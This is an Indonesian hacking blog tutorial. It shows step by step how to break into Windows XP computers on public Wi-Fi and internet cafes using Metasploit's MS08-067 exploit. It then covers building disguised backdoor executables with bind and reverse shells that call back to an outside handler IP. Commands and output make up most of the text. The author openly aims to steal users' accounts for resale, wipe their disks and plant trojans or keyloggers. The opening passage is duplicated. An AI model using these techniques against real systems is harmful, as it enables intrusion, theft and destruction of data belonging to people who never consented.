*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
 
Network Security (Hacking)…
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
1

4
5
6
7
- yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda 2- dapatkan secara GRATIS...
- OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe
- John the Ripper
- pwdump6 ( http://www[dot]foofus[dot]net/fizzgig/pwdump/ )
- TROJAN Buatan Sendiri atau keylogeer atau apalahhhh
- kopi panas

Ok Lets Begin
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :

1- msf > show exploits
2- windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow
3- windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service
4- RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
Wokeh,..sekarang kita Mulai menScan Komputer Target Kita…heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf > sudo nmap -v -sS -A -O 192.168.1.28
[*] exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org/ ) at 2009-03-21 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up ... good.
Interesting ports on 192.168.1.28:
Not shown: 1712 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds <------
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows
Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <—- ). Mari kita coba masuk ke komputer ini dengan menggunakan exploit windows/smb/ms08_067_netapi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Lihat opsi dari exploit ini dengan mengetikkan show options :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :
1
2
msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
rhost => 192.168.1.28
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
1
2
3
4
5
6
7
8
9
10
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
1
2
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp
Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
1
2
3
4
5
6
7
8
9
10
msf exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
----------- dipotong sampai disini ---------------
Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.1.28 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
 
sekarang jalankan exploit :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
Selamat…kita sudah Menguasai Satu Komputer….nahhhhhhh sekarang terserah anda….kan masih ada 3 alat lagi yang blom kita gunakan..
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
1
2
3
4
5
$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www[dot]metasploit[dot]com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread
Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf exploit(ms08_067_netapi) > exploit
 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)
 
meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.
Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit
 
[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)
 
meterpreter >
Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
 
Module options:
 
Name Current Setting Required Description
---- --------------- -------- -----------
 
Payload options (windows/meterpreter/reverse_tcp):
 
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
 
Exploit target:
 
Id Name
-- ----
0 Wildcard Target
 
msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit
 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:
1
2
3
4
5
6
7
$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse :P ), pada multi-handler akan muncul:
1
2
3
4
5
6
7
8
9
10
11
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)
 
meterpreter >
Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf exploit(handler) > sessions -l
 
Active sessions
===============
 
Id Description Tunnel
-- ----------- ------
3 Meterpreter 222.124.199.76:53 -> 10.10.96.146:4831
4 Meterpreter 222.124.199.76:53 -> 10.10.96.223:4836
5 Meterpreter 222.124.199.76:53 -> 10.10.96.215:4838
6 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4840
7 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4845
8 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4846
9 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4847
 
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows XP (Build 2600, ).
Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :

Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445